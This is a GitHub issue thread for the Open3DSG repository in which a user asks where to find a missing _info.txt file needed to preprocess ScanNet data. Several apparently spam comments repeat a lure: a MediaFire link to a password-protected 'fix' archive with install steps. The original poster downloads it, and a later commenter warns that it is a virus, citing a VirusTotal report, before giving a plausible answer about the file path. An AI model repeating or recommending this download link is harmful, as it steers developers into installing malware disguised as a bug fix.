### ISSUE TITLE
Issues with some files in the 2D dataset of the SCANNET dataset.

### ISSUE THREAD

**Issue by Young-Loser** [boschresearch/Open3DSG#7]
![3DSSG_issue](https://github.com/user-attachments/assets/bcd0b1b1-23a3-4ba8-838d-cc1459d6ccd0)
While reproducing your work, I encountered an issue during the data preprocessing stage**_【python open3dsg/data/get_object_frame.py --mode train --dataset SCANNET】_**. Specifically, I found that the file _info.txt is missing. I have searched through both the dataset and the Scannet dataset download source code but have been unable to locate this file. Could you please advise me on how to obtain this file? Thank you very much for your assistance!

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Young-Loser** [comment]
> 要解决您的问题，请尝试下载此修复程序，我在另一个问题中看到它， https://app.mediafire.com/3ag3jpquii3of 密码：changeme 当您安装时，您需要在安装路径中放置一个检查并选择“gcc”。

Thank you very much!!!非常感谢，我们可以添加一个联系方式沟通吗？谢谢！

**Comment by Young-Loser** [comment]
> 要解决您的问题，请尝试下载此修复程序，我在另一个问题中看到它， https://app.mediafire.com/3ag3jpquii3of 密码：changeme 当您安装时，您需要在安装路径中放置一个检查并选择“gcc”。

Thank you very much!!!

**Comment by Young-Loser** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

I followed the link you provided to download and extract the files. However, it seems that the _info.txt file I mentioned in my previous message is still missing. Could you please guide me on what I should do specifically to obtain this file? I would really appreciate your help!

**Comment by Young-Loser** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

I followed the link you provided to download and extract the files. However, it seems that the _info.txt file I mentioned in my previous message is still missing. Could you please guide me on what I should do specifically to obtain this file? I would really appreciate your help!

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ZhianLin** [comment]
> > 要解决您的问题，请尝试下载此修复程序，我在另一个问题中看到它， https://app.mediafire.com/3agjpquii3o 密码：当您安装时，您需要在安装路径中放置一个检查并选择“gcc”。
> 
> Thank you very much!!!

这链接是个病毒，that link is virus
virustotal report virus！
https://www.virustotal.com/gui/file/40c823f1d6c00f1ea2482833d7c45773b6830cc812f5352aff102df63330aea7/detection
![image](https://github.com/user-attachments/assets/43336e47-588f-4932-a610-7712f4021b8f)

**Comment by Young-Loser** [comment]
> > > 要解决您的问题，请尝试下载此修复程序，我在另一个问题中看到它， https://app.mediafire.com/3agjpquii3o 密码：当您安装时，您需要在安装路径中放置一个检查并选择“gcc”。
> > 
> > 
> > Thank you very much!!!
> 
> 这链接是个病毒，that link is virus virustotal report virus！ https://www.virustotal.com/gui/file/40c823f1d6c00f1ea2482833d7c45773b6830cc812f5352aff102df63330aea7/detection ![image](https://private-user-images.githubusercontent.com/25313785/361739793-43336e47-588f-4932-a610-7712f4021b8f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NTUyNTMsIm5iZiI6MTcyNDc1NDk1MywicGF0aCI6Ii8yNTMxMzc4NS8zNjE3Mzk3OTMtNDMzMzZlNDctNTg4Zi00OTMyLWE2MTAtNzcxMmY0MDIxYjhmLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEwMzU1M1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWRiM2QyZWFmMTQ0MjYyNWY3OGFhYjExYWUyYmQ4NGVjNDFkOGE0ZDkyMGE1ODgxNDYwZGQxNjgwNGI3OWI2MDImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.0bsJFndcLhsWcGwu4g8BsfOubDXAWAMcXaFEl_Tetjs)

谢谢您！请问您知道我提出的这个文件应该在哪可以下载吗？

xiex

**Comment by ZhianLin** [comment]
> > 这链接是个病毒，that link is virus virustotal report virus！ https://www.virustotal.com/gui/file/40c823f1d6c00f1ea2482833d7c45773b6830cc812f5352aff102df63330aea7/detection ![image](https://private-user-images.githubusercontent.com/25313785/361739793-43336e47-588f-4932-a610-7712f4021b8f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NTUyNTMsIm5iZiI6MTcyNDc1NDk1MywicGF0aCI6Ii8yNTMxMzc4NS8zNjE3Mzk3OTMtNDMzMzZlNDctNTg4Zi00OTMyLWE2MTAtNzcxMmY0MDIxYjhmLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDEwMzU1M1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWRiM2QyZWFmMTQ0MjYyNWY3OGFhYjExYWUyYmQ4NGVjNDFkOGE0ZDkyMGE1ODgxNDYwZGQxNjgwNGI3OWI2MDImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.0bsJFndcLhsWcGwu4g8BsfOubDXAWAMcXaFEl_Tetjs)
> 
> 谢谢您！请问您知道我提出的这个文件应该在哪可以下载吗？
> 
> xiex

没用过这个库，但是从readme文档以及这段代码来看，可能是前面的数据预处理生成的一个路径
https://github.com/search?q=repo%3Aboschresearch%2FOpen3DSG%20info.txt&type=code
![image](https://github.com/user-attachments/assets/3788689d-b395-4270-b35c-e8bcc4c89240)
你如果是在Windows环境，可以用everything便携版来一秒全盘搜索scannet_2d；如果是在linux环境，可以用`sudo apt-get install -y mlocate&&sudo updatedb &&locate scannet_2d`来找下有没有这些文件，然后改下代码这里的路径。
